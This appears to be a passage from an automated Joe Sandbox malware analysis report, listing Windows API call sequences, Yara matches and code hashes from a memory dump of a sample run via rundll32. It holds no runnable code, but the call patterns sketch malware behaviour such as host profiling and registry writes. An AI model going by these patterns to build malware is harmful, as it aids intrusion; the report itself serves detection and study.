                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,00B5F6B3,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,00000000), ref: 00B56972
                                          • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 00B569A6
                                          • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 00B569AE
                                          • GetLastError.KERNEL32 ref: 00B569B8
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 00B569D4
                                          • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 00B569ED
                                          • CancelIo.KERNEL32(?), ref: 00B56A02
                                          • CloseHandle.KERNEL32(?), ref: 00B56A12
                                          • GetLastError.KERNEL32 ref: 00B56A1A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                          • String ID:
                                          • API String ID: 4263211335-0

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B539EE
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00B53A04
                                          • _snwprintf.NTDLL ref: 00B53A29
                                          • CreateFileMappingW.KERNEL32(000000FF,00B79208,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 00B53A45
                                          • GetLastError.KERNEL32 ref: 00B53A57
                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00B53A6E
                                          • CloseHandle.KERNEL32(00000000), ref: 00B53A8F
                                          • GetLastError.KERNEL32 ref: 00B53A97
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: 150751b5aa379ecc21979deb5df5e06467c4ac3d1c1919e251da6c4bb7fdb6b3
                                          • Instruction ID: 8e31c3671be1db98fe5798907128d0e86f491e661c6570ea3e2dc4afb9184815
                                          • Opcode Fuzzy Hash: 150751b5aa379ecc21979deb5df5e06467c4ac3d1c1919e251da6c4bb7fdb6b3
                                          • Instruction Fuzzy Hash: 9721E773640208BBD721DB68CC09F9E77E9EB84B52F2140A0FA1DF72D0DB709A458B60
                                          Uniqueness
                                          • Uniqueness Score: -1.00%
                                          APIs
                                          • lstrlenW.KERNEL32(00000000,?,06149A03,?,?,06149A03,?,?,06149A03,?,?,06149A03,?,00000000,00000000,00000000), ref: 00B5B3AB
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B5B3CE
                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 00B5B3D6
                                          • lstrlenW.KERNEL32(00000000,?,06149A03,?,?,06149A03,?,?,06149A03,?,?,06149A03,?,?,06149A03,?), ref: 00B5B421
                                          • memcpy.NTDLL(00000000,?,?,?,?,?,?,00B5980E,?), ref: 00B5B489
                                          • LocalFree.KERNEL32(?,?,?,?,?,00B5980E,?), ref: 00B5B4A2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                          • String ID: P
                                          • API String ID: 3649579052-3110715001
                                          • Opcode ID: dcf87bc5d1af79f103ea10a801d7b770bf7161717215e9ef4c820d4c37834dfa
                                          • Instruction ID: 55aff52b026cf6931e5a939f77adcf5d5ab21bf870106eef88987831a377c491
                                          • Opcode Fuzzy Hash: dcf87bc5d1af79f103ea10a801d7b770bf7161717215e9ef4c820d4c37834dfa
                                          • Instruction Fuzzy Hash: AD61407190010EAFDF11EFA9CC88EAE7BF9EF44305B1540A5FA09A7211DB359D49CB60
                                          Uniqueness
                                          • Uniqueness Score: -1.00%
                                          APIs
                                            • Part of subcall function 00B6D5E6: InterlockedIncrement.KERNEL32(00000018), ref: 00B6D637
                                            • Part of subcall function 00B6D5E6: RtlLeaveCriticalSection.NTDLL(0614C398), ref: 00B6D6C2
                                          • OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C,00000000,00000000,?,?,?,00B5E219,?), ref: 00B6D872
                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,0000001C,00000000,00000000,?,?,?,00B5E219,?), ref: 00B6D890
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B6D8F8
                                          • lstrlenW.KERNEL32(?), ref: 00B6D96D
                                          • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 00B6D989
                                          • memcpy.NTDLL(00000014,?,00000002), ref: 00B6D9A1
                                            • Part of subcall function 00B51924: RtlLeaveCriticalSection.NTDLL(?), ref: 00B519A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                                          • String ID: o
                                          • API String ID: 2541713525-252678980
                                          • Opcode ID: 04997ffbb5312f298e0f0cc7b07318b70bb6ceb47845dbf3021052acbd543a31
                                          • Instruction ID: 52024aefc0e9d4770ebce473493e001f3d4ae17b53b50fed96b2f98412fdb1ce
                                          • Opcode Fuzzy Hash: 04997ffbb5312f298e0f0cc7b07318b70bb6ceb47845dbf3021052acbd543a31
                                          • Instruction Fuzzy Hash: 1F518D71B40706AFD720DF64C888BAAB7F8FF04705F104569EA59D7291EB78E984CB90
                                          Uniqueness
                                          • Uniqueness Score: -1.00%
                                          APIs
                                            • Part of subcall function 00B6BAC0: RegCreateKeyA.ADVAPI32(80000001,0614B7F0,?), ref: 00B6BAD5
                                            • Part of subcall function 00B6BAC0: lstrlen.KERNEL32(0614B7F0,00000000,00000000,00B7806E,?,?,?,00B56B9D,00000001,00000000,?), ref: 00B6BAFE
                                          • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00B59890
                                          • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00B598A8
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 00B5990A
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5991E
                                          • WaitForSingleObject.KERNEL32(00000000,?,00000000,?), ref: 00B59970
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 00B59999
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 00B599A9
                                          • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 00B599B2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                          • String ID:
                                          • API String ID: 3503961013-0
                                          • Opcode ID: 673d6d7b88348c760a55ce2bd6e8e8910daf4e339b0005cb15e1f4587b678416
                                          • Instruction ID: 75687d2aa459a967ba966814fc590046b1e1198c45d565bdf02e340c76311224
                                          • Opcode Fuzzy Hash: 673d6d7b88348c760a55ce2bd6e8e8910daf4e339b0005cb15e1f4587b678416
                                          • Instruction Fuzzy Hash: DA41A4B5D00119EFDF119FE4DC849EEBBB9FB48315F1044AAEA15A3220D7354A989B60
                                          Uniqueness
                                          • Uniqueness Score: -1.00%
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,00B62B68), ref: 00B5B18B
                                          • wsprintfA.USER32 ref: 00B5B1B3
                                          • lstrlen.KERNEL32(?), ref: 00B5B1C2
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          • wsprintfA.USER32 ref: 00B5B202
                                          • wsprintfA.USER32 ref: 00B5B237
                                          • memcpy.NTDLL(00000000,?,?), ref: 00B5B244
                                          • memcpy.NTDLL(00000008,00B743E8,00000002,00000000,?,?), ref: 00B5B259
                                          • wsprintfA.USER32 ref: 00B5B27C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                          • String ID:
                                          • API String ID: 2937943280-0
                                          • Opcode ID: 438109b163de108da8a3856e4978c6f6f9dc4c8fa0840f6bdc9f767966e539e1
                                          • Instruction ID: 17fb7463c789b4be6e959ea35c31db08544d77bf49684eac715ef85d60e949ee
                                          • Opcode Fuzzy Hash: 438109b163de108da8a3856e4978c6f6f9dc4c8fa0840f6bdc9f767966e539e1
                                          • Instruction Fuzzy Hash: A7412C71A0020AAFDB14DF98D884EAEB7FDEF44309B1544A5F919E7211EB31EE158B60
                                          Uniqueness
                                          • Uniqueness Score: -1.00%
                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 00B6FFCF
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B6FFE2
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 00B6FFF4
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00B56BDA), ref: 00B70018
                                          • GetComputerNameW.KERNEL32(00000000,?), ref: 00B70026
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B7003D
                                          • GetComputerNameW.KERNEL32(00000000,?), ref: 00B7004E
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B56BDA), ref: 00B70074
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 81b930d8b50c061e3e468cb164b7066844b34639e2a9ff809193d466b6f7bd5b
                                          • Instruction ID: 21fad8fa2f075bf2dba5731be591e34307cdf2c80e7212301bca70be047f3c0a
                                          • Opcode Fuzzy Hash: 81b930d8b50c061e3e468cb164b7066844b34639e2a9ff809193d466b6f7bd5b
                                          • Instruction Fuzzy Hash: B3314FB6A10109EFDB10DFB4DD859AEBBF9FB44310B148869E919D3210DB34DE84DB10
                                          Uniqueness
                                          • Uniqueness Score: -1.00%
                                          APIs
                                          • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,00B51036,?,?,?,?), ref: 00B6639C
                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B663AE
                                          • wcstombs.NTDLL ref: 00B663BC
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,00B51036,?,?,?), ref: 00B663E0
                                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00B663F5
                                          • mbstowcs.NTDLL ref: 00B66402
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00B51036,?,?,?,?,?), ref: 00B66414
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00B51036,?,?,?,?,?), ref: 00B6642E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                          • String ID:
                                          • API String ID: 316328430-0
                                          • Opcode ID: ce6f286bc87af082a491cd65bb00f63ccd7b62fe549cb4144a7122b28261c4bc
                                          • Instruction ID: e652732ed93cbeaa69cf400c6b53dd6c2ff92a5cbe170a9c635fee7d994320ba
                                          • Opcode Fuzzy Hash: ce6f286bc87af082a491cd65bb00f63ccd7b62fe549cb4144a7122b28261c4bc
                                          • Instruction Fuzzy Hash: 9F216D3190020AFFDF119FA4EC48E9A7BB9EF44315F104066FA09E3161DF7599A4DB60
                                          Uniqueness
                                          • Uniqueness Score: -1.00%
                                          APIs
                                          • lstrlen.KERNEL32(00B6C387,00000000,00000000,00B79460,?,?,00B61B32,00B6C387,00000000,00B6C387,00B79440), ref: 00B57587
                                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 00B57595
                                          • wsprintfA.USER32 ref: 00B575B1
                                          • RegCreateKeyA.ADVAPI32(80000001,00B79440,00000000), ref: 00B575C9
                                          • lstrlen.KERNEL32(?), ref: 00B575D8
                                          • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 00B575E6
                                          • RegCloseKey.ADVAPI32(?), ref: 00B575F1
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B57600
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                                          • String ID:
                                          • API String ID: 1575615994-0
                                          • Opcode ID: d91fe550d3cd89f91616200778f245643631067cecadb7e5a1f1f64677c20b76
                                          • Instruction ID: 3be3cef2d55c53ea79323cc02d24b70dbad2ba1fd658449c2ab1406378c077b0
                                          • Opcode Fuzzy Hash: d91fe550d3cd89f91616200778f245643631067cecadb7e5a1f1f64677c20b76
                                          • Instruction Fuzzy Hash: E8115B72240108BFEB015B94EC88EAA3B7DEB49715F100061FA0997260EF729D949B60
                                          Uniqueness
                                          • Uniqueness Score: -1.00%
                                          APIs
                                          • OpenProcess.KERNEL32(00000040,00000000,?), ref: 00B6CDAF
                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 00B6CDCD
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B6CDD5
                                          • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 00B6CDF3
                                          • GetLastError.KERNEL32 ref: 00B6CE07
                                          • RegCloseKey.ADVAPI32(?), ref: 00B6CE12
                                          • CloseHandle.KERNEL32(00000000), ref: 00B6CE19
                                          • GetLastError.KERNEL32 ref: 00B6CE21
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                          • String ID:
                                          • API String ID: 3822162776-0
                                          • Opcode ID: d53ff4fb043452b0bcc4cdd4eeef6e5057898be277deb70672ed5a7ab889aa2a
                                          • Instruction ID: 73fba043ab8e1eea468160ff5e0754b99a65c6be1f5f78e4f39f8271ce12a484
                                          • Opcode Fuzzy Hash: d53ff4fb043452b0bcc4cdd4eeef6e5057898be277deb70672ed5a7ab889aa2a
                                          • Instruction Fuzzy Hash: 98115E76140208FFDB015FA0DC48F6A3FB9EB48362F104020FA1AD6260DF36D9A4DB61
                                          Uniqueness
                                          • Uniqueness Score: -1.00%
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: ee1bf583df3bfd9f621c8cd49b82cb9d453c277a880a4695c3e4f82a6dbcef08
                                          • Instruction ID: d80e1feb5ae9edbc92608c8acd6c63f86e6f7b6fb4b9d063c3d99b10d4bf27c6
                                          • Opcode Fuzzy Hash: ee1bf583df3bfd9f621c8cd49b82cb9d453c277a880a4695c3e4f82a6dbcef08
                                          • Instruction Fuzzy Hash: 2AB13371C0021AEFDF21DB94CC48AEEBBB8EF09315F0441A1E914B7260DB399E95DB64
                                          Uniqueness
                                          • Uniqueness Score: -1.00%
                                          APIs
                                          • GetCommandLineA.KERNEL32(00B750F8,00000038,00B6600B,00000000,76DDF5B0,00B6339A,?,00000001,?,?,?,?,?,?,?,00B5BF69), ref: 00B64ADB
                                          • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B64AEC
                                            • Part of subcall function 00B53997: lstrlen.KERNEL32(?,00000000,76D86980,00000000,00B6780A,?), ref: 00B539A0
                                            • Part of subcall function 00B53997: memcpy.NTDLL(00000000,?,00000000,?), ref: 00B539C3
                                            • Part of subcall function 00B53997: memset.NTDLL ref: 00B539D2
                                          • ExitProcess.KERNEL32 ref: 00B64CCE
                                            • Part of subcall function 00B652C3: StrChrA.SHLWAPI(?,?,748FD3B0,0614C304,00000000,?,00B5CE0C,?,00000020,0614C304), ref: 00B652E8
                                            • Part of subcall function 00B652C3: StrTrimA.SHLWAPI(?,00B74FC4,00000000,?,00B5CE0C,?,00000020,0614C304), ref: 00B65307
                                            • Part of subcall function 00B652C3: StrChrA.SHLWAPI(?,?,?,00B5CE0C,?,00000020,0614C304), ref: 00B65313
                                          • lstrcmp.KERNEL32(?,?), ref: 00B64B5A
                                          • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,00B5BF69,?), ref: 00B64B72
                                            • Part of subcall function 00B69287: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0614B7F0,?,?,00B6BB0E,0000003A,0614B7F0,?,?,?,00B56B9D,00000001,00000000), ref: 00B692C7
                                            • Part of subcall function 00B69287: CloseHandle.KERNEL32(000000FF,?,?,00B6BB0E,0000003A,0614B7F0,?,?,?,00B56B9D,00000001,00000000,?), ref: 00B692D2
                                          • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,00B5BF69,?), ref: 00B64BE4
                                          • lstrcmp.KERNEL32(?,?), ref: 00B64BFD
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 739714153-0
                                          • Opcode ID: 46c78b63d36685bd70f2661c7724f6923b17744999f94c146985c106b21a90a8
                                          • Instruction ID: ece7899b318d4c5eb53614691230bb9ee37367d9822c7a126ec84a2c81446fa4
                                          • Opcode Fuzzy Hash: 46c78b63d36685bd70f2661c7724f6923b17744999f94c146985c106b21a90a8
                                          • Instruction Fuzzy Hash: 31517871901619AFDF14ABA0CC89EAEBBF9EF08701F0404A5F605F7260DB799985CF60
                                          Uniqueness
                                          • Uniqueness Score: -1.00%
                                          APIs
                                          • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 00B546B2
                                          • StrTrimA.SHLWAPI(00000000,?), ref: 00B546CF
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B54702
                                          • RtlImageNtHeader.NTDLL(00000000), ref: 00B5472B
                                          • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,00000000), ref: 00B547F0
                                            • Part of subcall function 00B53997: lstrlen.KERNEL32(?,00000000,76D86980,00000000,00B6780A,?), ref: 00B539A0
                                            • Part of subcall function 00B53997: memcpy.NTDLL(00000000,?,00000000,?), ref: 00B539C3
                                            • Part of subcall function 00B53997: memset.NTDLL ref: 00B539D2
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B547A1
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B547D0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                          • String ID:
                                          • API String ID: 239510280-0
                                          • Opcode ID: c2ab643bd9a1bd68c254a1625c2752693ed014d6421b4fab448cb4af3c5c6af6
                                          • Instruction ID: 4551d0d4a87193eec96f074504bde378983dbb77d7d44ea35e9f0c008ab1aa72
                                          • Opcode Fuzzy Hash: c2ab643bd9a1bd68c254a1625c2752693ed014d6421b4fab448cb4af3c5c6af6
                                          • Instruction Fuzzy Hash: 5D41A531600205BBEB125BA4DC85FAE7AF9EB4A746F1000E5FA09A7290DF758ED4D750
                                          Uniqueness
                                          • Uniqueness Score: -1.00%
                                          APIs
                                          • lstrlen.KERNEL32(00000000,?,?,00000000,77D34620,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B529
                                          • lstrlen.KERNEL32(?,?,?,00000000,77D34620,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B547
                                          • RtlAllocateHeap.NTDLL(00000000,76D86985,?), ref: 00B6B573
                                          • memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B58A
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B6B59D
                                          • memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B5AC
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,77D34620,?,00000001,00000001,?,00B663D9,?,?,?), ref: 00B6B610
                                            • Part of subcall function 00B51924: RtlLeaveCriticalSection.NTDLL(?), ref: 00B519A1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                                          • String ID:
                                          • API String ID: 1635816815-0
                                          • Opcode ID: 2bcf99cb72b42b44b5cadc8c7f681de629ecf606bf99a398a725ca5a7aefc8e9
                                          • Instruction ID: 5e9b2031d8903d70258a20434844b90c895ce5d592cbe2b068729c5ddd7becbb
                                          • Opcode Fuzzy Hash: 2bcf99cb72b42b44b5cadc8c7f681de629ecf606bf99a398a725ca5a7aefc8e9
                                          • Instruction Fuzzy Hash: CB415C31900214ABDF219FA8DC94EDEBBF5EF14350F0145A5F90AE7161DB749E90DB90
                                          Uniqueness
                                          • Uniqueness Score: -1.00%
                                          APIs
                                          • RtlImageNtHeader.NTDLL ref: 00B64F8D
                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 00B64FD0
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B64FEB
                                          • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 00B65041
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 00B6509D
                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 00B650AB
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B650B6
                                            • Part of subcall function 00B52F6E: RegCreateKeyA.ADVAPI32(80000001,?,-00000005), ref: 00B52F82
                                            • Part of subcall function 00B52F6E: memcpy.NTDLL(00000000,00000001,-00000005,-00000005,-00000005,?,00B51B3D,?,00000000,-00000005,00000001), ref: 00B52FAB
                                            • Part of subcall function 00B52F6E: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,-00000005), ref: 00B52FD4
                                            • Part of subcall function 00B52F6E: RegCloseKey.ADVAPI32(-00000005,?,00B51B3D,?,00000000,-00000005,00000001), ref: 00B52FFF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                                          • String ID:
                                          • API String ID: 3181710096-0
                                          • Opcode ID: 32dbf6cf113e38ffacbb2ca0f016d11df311f2b872c05985a645ba58043e105e
                                          • Instruction ID: 4d123e6e6754689da399548100c7b26a07a67f1f2f3dc574ae2ea2a25cffcd75
                                          • Opcode Fuzzy Hash: 32dbf6cf113e38ffacbb2ca0f016d11df311f2b872c05985a645ba58043e105e
                                          • Instruction Fuzzy Hash: 80418832200605ABEB319F24DC88F6A3BE9EB00741F1500A4F90A97261DF75DDA5CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00B5EF84
                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00B5EFB2
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00B5EFF7
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B5F01F
                                          • _strupr.NTDLL ref: 00B5F04A
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 00B5F057
                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 00B5F071
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                                          • String ID:
                                          • API String ID: 3831658075-0
                                          • Opcode ID: 5bb7d6467e698675b85e8bacb1fe2ead2e804c92514753109f3b1306f52fbc1a
                                          • Instruction ID: b100485489b861aa6e8a2ddf975d296efdfd4129b21b2c4025cc5e44a51364dd
                                          • Opcode Fuzzy Hash: 5bb7d6467e698675b85e8bacb1fe2ead2e804c92514753109f3b1306f52fbc1a
                                          • Instruction Fuzzy Hash: B2416371900219EFDF219FA4CC49BEDBBB8EF44701F1844E6E915A3191DB749A84DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InterlockedIncrement.KERNEL32(00B7908C), ref: 00B57E57
                                          • lstrcpy.KERNEL32(00000000), ref: 00B57E93
                                            • Part of subcall function 00B5ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,00B6A2DC,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B5AE07
                                            • Part of subcall function 00B5ADF8: mbstowcs.NTDLL ref: 00B5AE23
                                          • GetLastError.KERNEL32(00000000), ref: 00B57F22
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B57F39
                                          • InterlockedDecrement.KERNEL32(00B7908C), ref: 00B57F50
                                          • DeleteFileA.KERNEL32(00000000), ref: 00B57F71
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B57F81
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                            • Part of subcall function 00B666BC: GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                            • Part of subcall function 00B666BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                            • Part of subcall function 00B666BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                            • Part of subcall function 00B666BC: lstrcpy.KERNEL32(00000000), ref: 00B66730
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
